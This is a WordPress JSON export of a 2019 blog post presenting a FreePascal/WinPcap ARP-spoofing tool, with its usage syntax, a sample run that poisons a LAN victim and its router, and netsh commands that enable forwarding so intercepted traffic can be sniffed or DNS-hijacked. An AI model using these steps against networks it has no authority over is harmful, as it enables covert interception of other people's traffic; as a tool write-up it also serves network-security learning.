{"id":2087,"date":"2019-02-23T21:52:00","date_gmt":"2019-02-23T20:52:00","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2087"},"modified":"2019-02-24T14:05:55","modified_gmt":"2019-02-24T13:05:55","slug":"arpspoof-freepascal","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2087","title":{"rendered":"arpspoof-freepascal"},"content":{"rendered":"<p>Let's play with <a href=\"https:\/\/www.winpcap.org\/\" rel=\"noopener\" target=\"_blank\">WinPcap<\/a>.<\/p>\n<p>Quoting the WinPcap web site: <em>\u00ab\u00a0WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers\u00a0\u00bb.<\/em><\/p>\n<p>Let's use it to perform a quick and easy <a href=\"https:\/\/en.wikipedia.org\/wiki\/Man-in-the-middle_attack\" rel=\"noopener\" target=\"_blank\">man-in-the-middle attack<\/a> with <a href=\"https:\/\/en.wikipedia.org\/wiki\/ARP_spoofing\" rel=\"noopener\" target=\"_blank\">ARP spoofing<\/a>.<\/p>\n<p>Quoting Wikipedia: <em>\u00ab\u00a0a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other\u00a0\u00bb.<\/em><\/p>\n<p>Source code and binaries are available <a href=\"https:\/\/github.com\/erwan2212\/arpspoof-freepascal\" rel=\"noopener\" target=\"_blank\">here<\/a>.<\/p>\n<p>Usage is:<br \/>\n<strong>arpspoof 1.0 by erwan2212@gmail.com<br \/>\narpspoof list-interfaces<br \/>\narpspoof interface-index ip1 ip2<\/strong><\/p>\n<p>Example:<br \/>\n<strong>arpspoof.exe 0 192.168.1.125 192.168.1.250<br \/>\narpspoof 1.0 by erwan2212@gmail.com<br \/>\narpspoof list-interfaces<br \/>\narpspoof interface-index ip1 ip2<br \/>\nip1:192.168.1.125 mac1:001DE0-567737<br \/>\nip2:192.168.1.250 mac2:C05627-B7FD32<br \/>\nspoofed mac:94DE80-C2A41E<br \/>\nsending packets&#8230;press a key to 
stop&#8230;<\/strong><\/p>\n<p>192.168.1.125 is the victim (a computer on my network).<br \/>\n192.168.1.250 is the gateway\/router on my network.<br \/>\n94DE80-C2A41E is my MAC address (i.e. the attacker's MAC address).<\/p>\n<p>192.168.1.125 will believe that the MAC address of the router (192.168.1.250) is mine, i.e. 94DE80-C2A41E.<br \/>\n192.168.1.250 will believe that the MAC address of the victim (192.168.1.125) is mine, i.e. 94DE80-C2A41E.<br \/>\nIn effect, all traffic between these 2 hosts will go through my computer.<\/p>\n<p>One important thing not to forget: enable forwarding on your computer, or else all traffic between these 2 hosts will be dropped.<br \/>\nHow? Easy:<br \/>\n-check your interfaces: <strong>netsh interface ipv4 show interfaces<\/strong><br \/>\n-enable forwarding on the desired interface: <strong>netsh interface ipv4 set interface x forwarding=\"enabled\"<\/strong><\/p>\n<p>Now you can perform an attack with <a href=\"https:\/\/labalec.fr\/erwan\/?p=2082\" rel=\"noopener\" target=\"_blank\">intercept-dns<\/a> from a previous article (don't forget to do a set layer=forward on the command line then).<br \/>\nOr simply sniff\/capture the traffic with <a href=\"https:\/\/github.com\/erwan2212\/windivert-fpc\/tree\/master\/netdump\" rel=\"noopener\" target=\"_blank\">netdump<\/a>.<\/p>\n<p>Note that you could also use a GUI like <a href=\"https:\/\/labalec.fr\/erwan\/?p=1027\" rel=\"noopener\" target=\"_blank\">Iptools<\/a> to perform arpspoof.<br \/>\nSee example screenshot <a href=\"https:\/\/imgur.com\/a\/YNIvCh0\" rel=\"noopener\" target=\"_blank\">here<\/a> (C=client\/victim, R=router).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Let's play with WinPcap. Quoting the WinPcap web site: \u00ab\u00a0WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers\u00a0\u00bb. 
Let's use it to perform a quick and easy man-in-the-middle attack with ARP spoofing. Quoting Wikipedia: \u00ab\u00a0a man-in-the-middle <a href='https:\/\/labalec.fr\/erwan\/?p=2087' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[108,107,106],"class_list":["post-2087","post","type-post","status-publish","format-standard","hentry","category-network","tag-arpspoof","tag-mitm","tag-winpcap","category-5-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2087"}],"version-history":[{"count":8,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087\/revisions"}],"predecessor-version":[{"id":2099,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2087\/revisions\/2099"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}